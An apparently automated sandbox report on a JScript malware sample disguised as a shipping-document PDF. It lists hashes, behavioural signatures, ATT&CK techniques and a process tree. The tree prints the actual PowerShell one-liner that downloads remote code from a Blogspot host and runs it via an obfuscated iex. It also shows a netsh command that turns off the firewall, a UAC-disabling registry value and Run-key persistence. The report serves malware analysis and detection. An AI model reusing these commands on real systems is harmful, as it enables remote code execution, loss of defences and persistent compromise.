Analysis
max time kernel: 144s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20231222-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-01-2024 13:40
Static task: static1
Behavioral task: behavioral1
Sample: BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
Resource: win7-20231215-en
Behavioral task: behavioral2
Sample: BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
Resource: win10v2004-20231222-en
General
Target: BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
Size: 1.4MB
MD5: 286d534eb759c671fa9e79cfafd3bc85
SHA1: d165938c1c607618c5cb6d9d11cf5b371f007ac7
SHA256: 77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
SHA512: 3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
SSDEEP: 192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes: powershell.exe
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: powershell.exe)
Blocklisted process makes network request 2 IoCs
Processes: powershell.exe
- flow 11: pid 468, process powershell.exe
- flow 13: pid 468, process powershell.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: wscript.exe
- Key value queried: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation (process: wscript.exe)
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: powershell.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" (process: powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 (process: powershell.exe)
Adds Run key to start application 2 TTPs 1 IoCs
Processes: powershell.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" (process: powershell.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 87: api.ipify.org
- flow 89: api.ipify.org
- flow 99: ip-api.com
Suspicious use of SetThreadContext 3 IoCs
Processes: powershell.exe
- PID 468 set thread context of 5112 (pid: 468, process: powershell.exe, target process: RegSvcs.exe)
- PID 468 set thread context of 3576 (pid: 468, process: powershell.exe, target process: RegSvcs.exe)
- PID 468 set thread context of 2212 (pid: 468, process: powershell.exe, target process: Msbuild.exe)
Drops file in Windows directory 1 IoCs
Processes: dw20.exe
- File created: C:\Windows\AppCompat\Programs\Amcache.hve.tmp (process: dw20.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: dw20.exe, dw20.exe
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (process: dw20.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (process: dw20.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (process: dw20.exe)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (process: dw20.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (process: dw20.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (process: dw20.exe)
Enumerates system info in registry 2 TTPs 4 IoCs
Processes: dw20.exe, dw20.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (process: dw20.exe)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (process: dw20.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (process: dw20.exe)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (process: dw20.exe)
Modifies registry class 3 IoCs
Processes: powershell.exe
- Key created: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} (process: powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 (process: powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" (process: powershell.exe)
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes: powershell.exe, RegSvcs.exe
- pid 468: powershell.exe
- pid 468: powershell.exe
- pid 468: powershell.exe
- pid 468: powershell.exe
- pid 468: powershell.exe
- pid 468: powershell.exe
- pid 468: powershell.exe
- pid 5112: RegSvcs.exe
- pid 5112: RegSvcs.exe
- pid 5112: RegSvcs.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 38 IoCs
Processes
C:\Windows\system32\wscript.exe
command line: wscript.exe "C:\Users\Admin\AppData\Local\Temp\BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
  - UAC bypass
  - Blocklisted process makes network request
  - Registers COM server for autorun
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.cmdline"
    - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5709.tmp" "c:\Users\Admin\AppData\Local\Temp\vyldccjb\CSC2BB580203AA3408988EC8A881C8446C0.TMP"
    C:\Windows\system32\netsh.exe
    command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
    - Modifies Windows Firewall
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      command line: dw20.exe -x -s 788
      - Drops file in Windows directory
      - Checks processor information in registry
      - Enumerates system info in registry
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
    command line: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
    - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      command line: dw20.exe -x -s 780
      - Checks processor information in registry
      - Enumerates system info in registry
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\rundll32.exe
command line: "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
command line: C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
- Create or Modify System Process (1)
- Windows Service (1)
- Boot or Logon Autostart Execution (2)
- Registry Run Keys / Startup Folder (2)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
- Bypass User Account Control (1)
- Create or Modify System Process (1)
- Windows Service (1)
- Boot or Logon Autostart Execution (2)
- Registry Run Keys / Startup Folder (2)
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES5709.tmp
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezbxlefq.oxw.ps1
Filesize: 60B
-
C:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.dll
Filesize: 3KB
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\CSC2BB580203AA3408988EC8A881C8446C0.TMP
Filesize: 652B
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.0.cs
Filesize: 870B
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.cmdline
Filesize: 369B